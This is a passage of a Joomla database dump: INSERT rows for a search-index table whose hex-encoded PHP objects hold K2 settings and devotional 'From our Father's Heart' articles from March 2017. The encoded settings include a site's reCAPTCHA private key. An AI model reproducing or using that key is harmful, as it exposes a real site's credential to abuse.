63a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223131223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2233303a66726f6d2d6f75722d6661746865722d732d68656172742d31322d30332d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f33302d66726f6d2d6f75722d6661746865722d732d68656172742d31322d30332d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3330223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d33303a66726f6d2d6f75722d6661746865722d732d68656172742d31322d30332d32303137223b733a353a227469746c65223b733a33363a2246726f6d206f7572204661746865722773204865617274202831322f30332f3230313729223b733a31313a226465736372697074696f6e223b733a3434343a2220446561726c792042656c6f7665642c20492077616e7420746f207368617265207769746820796f7520746f646179206f6e20736f6d6520637269746963616c207472757468732061626f75742061737369676e6d656e742e20476f6420646f6573206e6f74206c6f6f6b20617420686f77207375636365737366756c206d656e2061726520696e20627573696e65737320696e20726174696e6720686f77207375636365737366756c2074686579206172652c20726174686572206865206c6f6f6b7320617420686f7720726573706f6e7369626c6520746865792061726520696e2068616e646c696e672061737369676e6d656e74732e2041737369676e6d656e7420697320646966666572656e742066726f6d206d696e69737472792c20616e6420796f75206d757374206e6576657220636f6e66757365207468652074776f2e2041206d616e2063616e20686176652061206d696e69737472792062757420776974686f75742061737369676e6d656e742c2073756368206d656e20646f6ee2809974206c61737420616e64206576656e7475616c6c7920476f642077696c6c20776974686472617720746865206d696e69737472792e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30332d31322031363a35313a3431223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30332d31322031363a35313a3431223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(262, 'index.php?option=com_k2&view=item&id=33', 'index.php?option=com_k2&view=item&id=33:from-our-father-s-heart-20-03-2017', 'From our Father\'s Heart (20/03/2017)', ' Dearly Beloved, BUILD UP YOUR SPIRIT! Work to strengthen your spirit man. Recognize that man has a tripartite nature. There is a need to be strong in your inner man. You are a spirit who has a soul and lives in a body. Your spirit is that part of you that communes with God. If your spirit will be able to lead your body and soul effectively, it must be stronger than your soul and your body. ', '2017-06-25 14:19:38', 'c6469e41a6f6e56ebaf09a4c3d3ac292', 1, 1, 1, '*', '2017-03-20 17:54:08', '0000-00-00 00:00:00', '2017-03-20 17:54:08', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223333223b733a353a22616c696173223b733a33343a2266726f6d2d6f75722d6661746865722d732d68656172742d32302d30332d32303137223b733a373a2273756d6d617279223b733a3436383a223c703e3c7374726f6e673e446561726c792042656c6f7665642cc2a03c2f7374726f6e673e3c2f703e0d0a3c703e3c7374726f6e673e4255494c4420555020594f55522053504952495421c2a03c2f7374726f6e673e3c2f703e0d0a3c703e576f726b20746f20737472656e677468656e20796f757220737069726974206d616e2e205265636f676e697a652074686174206d616e2068617320612074726970617274697465206e61747572652e20c2a054686572652069732061206e65656420746f206265207374726f6e6720696e20796f757220696e6e6572206d616e2e20596f75206172652061207370697269742077686f20686173206120736f756c20616e64206c6976657320696e206120626f64792e20596f75722073706972697420697320746861742070617274206f6620796f75207468617420636f6d6d756e6573207769746820476f642e20496620796f7572207370697269742077696c6c2062652061626c6520746f206c65616420796f757220626f647920616e6420736f756c206566666563746976656c792c206974206d757374206265207374726f6e676572207468616e20796f757220736f756c20616e6420796f757220626f64792ec2a020c2a020c2a020c2a03c2f703e0d0a223b733a343a22626f6479223b733a343231363a220d0a3c703e3c7374726f6e673e50726f76657262732031383a31343c2f7374726f6e673e3c2f703e0d0a3c703e31342054686520737069726974206f662061206d616e2077696c6c207375737461696e2068696d20696e207369636b6e6573732c204275742077686f2063616e206265617220612062726f6b656e207370697269743fc2a03c2f703e0d0a3c703e49742074616b65732061207374726f6e6765722073706972697420746f207375737461696e2061206d616e2c20746f206c65616420796f757220736f756c20616e6420626f64792e2054686520736f756c20697320796f75722073656174206f6620726561736f6e696e672c2077696c6c2c20616e6420656d6f74696f6e733b2074686573652063616e2074616b6520796f75206f76657220616e64206c65616420796f75207468726f756768206c6966652e204365727461696e2062656c6965766572732061726520686967686c7920636572656272616c20616e642063616e20616c6d6f737420616c77617973206578706c61696e206576657279206d6f7665206f6620476f642061776179206173206d6572656c7920706879736963616c206f6363757272656e6365732e20537563682061726520736f756c6973682070656f706c652e204f746865727320617265206a75737420656d6f74696f6e616c3b207468656972206465636973696f6e7320617265206d6f726520656d6f74696f6e616c6c79206261736564207468616e2073706972697475616c2e20456d6f74696f6e2d6c65642062656c69657665727320616c77617973206d69737320476f6420696e206c696665206265636175736520476f64206973206e6f7420656d6f74696f6e616c2e20476f642069732073706972697475616c2ec2a03c2f703e0d0a3c703e537465707320746f20737472656e677468656e20796f757220737069726974206d616e20696e636c7564653a3c2f703e0d0a3c703e312e20c2a020c2a020c2a020c2a047697665206974206c6966653a2047657474696e6720626f726e2d616761696e20697320746865206669727374207374657020746f20737472656e677468656e20796f757220737069726974206d616e2e2047657474696e6720626f726e2d616761696e206272696e677320796f757220737069726974206d616e20616c6976652e20596f752073746f70206265696e67206a757374206120626f64792e20596f757220636f6e736369656e6365206177616b656e7320616e64207468656e20796f75206861766520612074656d706c61746520746f206275696c64206f6e2e3c2f703e0d0a3c703e322e20c2a020c2a020c2a0204665656420796f7572207370697269743a204d61747468657720343a3420736179732c20e2809c42757420486520616e73776572656420616e6420736169642c20e280984974206973207772697474656e2c20e2809c4d616e207368616c6c206e6f74206c69766520627920627265616420616c6f6e652c2062757420627920657665727920776f726420746861742070726f63656564732066726f6d20746865206d6f757468206f6620476f642ee2809de28099e2809d20596f757220737069726974206e6565647320476f64e280997320776f726420746f20737572766976652e204f70656e20757020746f20476f64e280997320776f72642e20486561722074686520776f72642c20737065616b2074686520776f72642c20636f6e666573732074686520776f72642c206465636c6172652074686520776f72642c20726561642074686520776f72642c207468696e6b206f6e2074686520776f72642c20736f616b20697420696e2c206d656d6f726973652074686520776f72642e20446f696e672074686573652077696c6c2066617474656e20796f75722073706972697420616e64206d616b6520697420726f627573742e3c2f703e0d0a3c703e332e20c2a020c2a020c2a020457865726369736520796f7572207370697269743a205370656e642074696d6520746f20657865726369736520796f757220737069726974206d616e2062792070726179696e6720696e2074686520486f6c792047686f73742e204a75646520323020736179732c20e2809c42757420796f752c2062656c6f7665642c206275696c64696e6720796f757273656c766573207570206f6e20796f7572206d6f737420686f6c792066616974682c2070726179696e6720696e2074686520486f6c79205370697269742ee2809d2050726179696e6720696e20746865205370697269742063617573657320796f757220737069726974206d616e20746f2072697365207570207374726f6e676572206c696b6520616e20656469666963652e3c2f703e0d0a3c703e342e20c2a020c2a020c2a020576f72736869703a205370656e64696e672074696d6520746f20776f727368697020476f64206275696c647320757020796f7572207370697269742e3c2f703e0d0a3c703e352e20c2a020c2a020c2a02050726f7465637420796f7572207370697269742066726f6d20706f6c6c7574696f6e7320616e642070657276657273696f6e732e3c2f703e0d0a3c703e362e20c2a020c2a020c2a0204d65646974617465206f6e20476f64e280997320776f72642e3c2f703e0d0a3c703e42656c6f7665642c206b6e6f77207468617420796f7520617265206d6f7265207468616e206120626f647920616e6420796f757220737069726974206d616e20697320746865206c65616465722e20486f77657665722c2061207765616b207370697269742063616e6e6f74206c65616420796f757220626f647920616e6420796f757220736f756c2e20476f64e280997320706c616e20697320666f7220796f7520746f20626520737472656e677468656e656420696e20796f757220696e6e6572206d616e2ec2a03c2f703e0d0a3c703e5072696f726974697a6520646576656c6f70696e6720796f7572207370697269742e20596f7572206c69666520686173206d616e7920706172747320627574207468652073706972697475616c2073696465206f6620796f7572206c6966652069732074686520666f756e646174696f6e2075706f6e20776869636820616c6c206f746865722061737065637473206f6620796f7572206c69666520646570656e64206f6e2e205468652053637269707475726520736179732c20e2809c54686520737069726974206f662061206d616e2077696c6c207375737461696e2068696d20696e207369636b6e6573732c204275742077686f2063616e206265617220612062726f6b656e20737069726974202850726f2e2031383a3134293fe2809d20596f75722073706972697420697320746865207265616c20796f752ec2a03c2f703e0d0a3c703e45766572792068756d616e206265696e6720686173203320706172747320e28093207370697269742c20736f756c20616e6420626f647920e2809320627574207468652073706972697420697320746865207265616c206d616e20696e2065766572792043687269737469616e20616e642065766572792043687269737469616e206d75737420756e6465727374616e642074686174206865206973206120737069726974207468617420686173206120736f756c20616e64206c6976657320696e206120626f64792e205468657265666f72652c20796f75722073706972697475616c207374616e636520616e64207374616d696e612061726520776861742064657465726d696e6520686f7720746865206f746865722061737065637473206f6620796f7572206c6966652077696c6c207374616e6420e280932077686574686572207765616b2c207374726f6e67206f7220657863656c6c656e742e20546865207374726f6e67657220796f7572207370697269742c20746865207374726f6e67657220616e64206d6f726520696e666c75656e7469616c20796f7572206c6966652077696c6c2062652ec2a03c2f703e0d0a3c703e41732061204a6f736570682c20796f752063616e6e6f74206166666f726420746f206e65676c65637420746865207370697269742073696465206f6620796f7572206c6966652e205468652074696d6520796f75207370656e6420746f20646576656c6f7020796f757220737069726974206d757374206265206120766572792070726563696f757320616e64207361637265642074696d6520746f20796f7520626563617573652069742069732075706f6e2074686973207468617420616c6c206f74686572206172656173206f6620796f7572206c69666520646570656e642ec2a03c2f703e0d0a3c703e546f2074616b652063617265206f6620796f75722073706972697475616c206c69666520796f75206e65656420746f20626520636f6e7374616e746c79206f70656e656420746f2074686520466174686572206f6620616c6c20737069726974732c20476f642e204865206d61646520796f75722073706972697420616e642074686520737472656e677468206f6620796f75722073706972697420617320612043687269737469616e20616e642061732061204a6f736570682077696c6c20666c6f772066726f6d20476f642e20596f75207468657265666f7265206d7573742074616b652074696d6520746f2066656c6c6f7773686970207769746820476f643b2066656c6c6f7773686970207769746820476f64e280997320576f72642c2066656c6c6f77736869702077697468206f74686572206d656e2077697468207374726f6e6